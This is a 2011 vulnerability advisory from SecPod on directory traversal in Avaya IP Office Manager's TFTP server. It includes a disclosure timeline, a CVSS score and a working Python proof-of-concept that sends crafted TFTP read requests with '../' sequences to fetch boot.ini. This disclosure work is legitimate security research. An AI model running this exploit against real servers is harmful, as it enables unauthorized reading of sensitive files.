Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability

##############################################################################

Title    : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability
Author   : Veerendra G.G from SecPod Technologies (www.secpod.com)
Vendor   : http://www.avaya.com/usa/product/ip-office
Advisory : http://www.avaya.com/usa/product/ip-office
           http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
           http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
           http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
Version  : Avaya IP Office Manager TFTP Server Version 8.1
Date     : 08/07/2011

###############################################################################

SecPod ID: 1017     25/05/2011 Issue Discovered
                                                31/05/2011 Vendor Notified
                                                No Response from the Vendor
                                    08/07/2011 Advisory Released
           

Class: Information Disclosure   Severity: Medium

Overview:
---------
Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory
Traversal vulnerability.

Technical Description:
----------------------
The vulnerability is caused due to improper validation to Read Request
Parameter containing '../' sequences, which allows attackers to read
arbitrary files via directory traversal attacks.

Impact:
--------
Successful exploitation could allow an attacker to to obtain sensitive
information, which can lead to launching further attacks.

Affected Software:
------------------
Avaya IP Office Manager TFTP Server Version 8.1

Tested on:
-----------
Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3.

References:
-----------
http://secpod.org/blog/?p=225
http://www.avaya.com/usa/product/ip-office
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt

Proof of Concept:
----------------
http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap

Solution:
----------
Not available

Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = PARTIAL
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
        CVSS Temporal Score    = 4.5
        Risk factor            = Medium

Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.

SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py:

#!/usr/bin/python
##############################################################################
# Exploit   : http://secpod.org/blog/?p=3D225
#             http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
#             http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Get File content using Directory Traversal Attack
# Tested against Avaya Office IP Manager 8.1
##############################################################################

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock =3D socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data =3D udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ =3D=3D "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST =3D sys.argv[1]       =09=09=09## The Server IP
    PORT =3D 69                =09=09=09## Default TFTP port

    data =3D "\x00\x01"        =09=09=09## TFTP Read Request
    data +=3D "../" * 10 + "boot.ini" + "\x00"=09## Read boot.ini file using directory traversal
    data +=3D "octet\x00"=09=09=09=09## TFTP Type

    rec_data =3D sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()